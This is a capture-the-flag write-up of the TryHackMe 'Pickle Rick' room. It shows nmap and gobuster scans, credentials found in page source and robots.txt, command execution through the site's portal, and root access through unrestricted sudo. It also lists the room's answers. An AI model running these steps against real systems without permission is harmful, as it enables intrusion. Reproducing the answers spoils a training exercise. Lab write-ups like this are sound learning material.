Pickle Rick

Date: 10 November, 2021

Author: Dhaval Kotak

Room: Pickle Rick

Port Scanning

nanomite @ zeus in ~/thm/pickle_rick
⚡️ nmap -A 10.10.117.227 | tee nmap.log
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-10 15:15 IST
Nmap scan report for 10.10.117.227
Host is up (0.21s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c7:6f:b8:7d:07:b7:15:ce:0e:72:c5:f3:26:9c:d2:58 (RSA)
|   256 57:a8:4c:12:5a:15:78:f0:d4:85:40:54:db:04:3b:a3 (ECDSA)
|_  256 67:bb:90:10:c9:3e:30:4b:0f:81:34:d1:98:b6:5c:bc (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.38 seconds

Gobuster Scanning

nanomite @ zeus in ~/thm/pickle_rick
⚡️ gobuster dir -u http://10.10.117.227 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.117.227
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/11/10 15:17:16 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 292]
/.htaccess            (Status: 403) [Size: 297]
/.htpasswd            (Status: 403) [Size: 297]
/assets               (Status: 301) [Size: 315] [--> http://10.10.117.227/assets/]
/denied.php           (Status: 302) [Size: 0] [--> /login.php]                  
/index.html           (Status: 200) [Size: 1062]                                
/login.php            (Status: 200) [Size: 882]                                 
/portal.php           (Status: 302) [Size: 0] [--> /login.php]                  
/robots.txt           (Status: 200) [Size: 17]                            
/server-status        (Status: 403) [Size: 299]                                 

===============================================================
2021/11/10 15:18:38 Finished
===============================================================

Information Gathering

Username

We find a username in the source code of the home page of the website

<!--

    Note to self, remember username!

    Username: R1ckRul3s

  -->

Robots.txt

Looking at robots.txt we find this text instead of Allow or Disallow

Wubbalubbadubdub

Login.php

We can try to use these two as username and password.

R1ckRul3s:Wubbalubbadubdub

And we are logged in!

Command Execution

By running ls, we get the following result:

Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt

Commands like cat, head and tail are not working.

So I tried less to print the text

less Sup3rS3cretPickl3Ingred.txt

What is the first ingredient Rick needs?

• mr. meeseek hair

As per clue the other ingredient was somewhere in the file system.

So I was looking in /home/rick in which the second ingredient was there.

cd /home/rick; less "second ingredients"

What is the second ingredient Rick needs?

• 1 jerry tear

I guess the final ingredient is in /root so lets first check if there are any binaries we can exploit.

sudo -l

Matching Defaults entries for www-data on ip-10-10-117-227.eu-west-1.compute.internal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ip-10-10-117-227.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL

This means we have all the permission to run all the commands as root. Fantastic!

sudo ls -la /root

total 28
drwx------  4 root root 4096 Feb 10  2019 .
drwxr-xr-x 23 root root 4096 Nov 10 09:45 ..
-rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4096 Feb 10  2019 .ssh
-rw-r--r--  1 root root   29 Feb 10  2019 3rd.txt
drwxr-xr-x  3 root root 4096 Feb 10  2019 snap

sudo less /root/3rd.txt

3rd ingredients: fleeb juice

What is the final ingredient Rick needs?

• fleeb juice